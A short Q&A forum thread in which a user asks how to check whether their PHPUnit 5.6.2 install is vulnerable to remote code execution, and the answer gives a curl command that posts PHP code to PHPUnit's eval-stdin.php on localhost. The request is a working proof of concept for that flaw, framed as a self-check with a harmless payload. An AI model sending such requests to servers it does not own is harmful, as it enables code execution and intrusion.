0 votes
Lets I've installed PHPUnit version is 5.6.2. Which is vulnerable to Remote Code Execution. How can I check this vulnerability?
by (111 points)

1 Answer

0 votes

Let's you have that vulnerable PHPUnit in http://localhost/vendor/phpunit/.

So you can check by printing the value of pi using this cURL command.

$ curl --data "<?php echo(pi());" http://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
by (188 points)
...